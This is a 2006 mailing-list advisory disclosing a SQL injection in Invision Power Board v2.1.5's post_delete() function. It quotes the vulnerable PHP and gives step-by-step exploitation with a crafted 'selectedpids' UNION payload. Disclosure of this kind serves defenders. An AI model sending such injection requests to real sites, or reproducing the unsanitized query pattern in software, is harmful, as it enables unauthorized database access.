Invision Power Board v2.1.5 Remote SQL Injection
Date: 28 Apr 2006 08:21:50 -0000
From: [email protected]
To: [email protected]
Subject: Invision Power Board v2.1.5 Remote SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
Invision Power Board v2.1.5 Remote SQL Injection
Filename :- func_mod.php
Functionname :- post_delete()
Lines :- 89 To 209
Bug Found By :- Devil-00
Greetz :-
Rock Master ^ Hackers Pal ^ n0m4rcy ^
www.securtygurus.net
if ( is_array( $id ) )
{
if ( count($id) > 0 )
{
$pid = " IN(".implode(",",$id).")";
}
else
{
return FALSE;
}
}
else
{
if ( intval($id) )
{
$pid = "=$id";
}
else
{
return FALSE;
}
}
When $id = array .. the code don't check it if ( INTVAL )
if ( count($id) > 0 )
{
$pid = " IN(".implode(",",$id).")";
}
}
Then We Can Do SQL Injection Here >>
$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );
$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );
And Here >>
$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) );
$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => "attach_pid".$pid ) );
Cuz We Have 2 Querys With diffiernt Tabels Number We Can't Use UNION To Exploit :( Baaad :(
Exm. To Exploit
1- First Add 2 Post
2- Check It To Delete
3- Edit String Query By HTTPLiveHeader
act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete
act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete
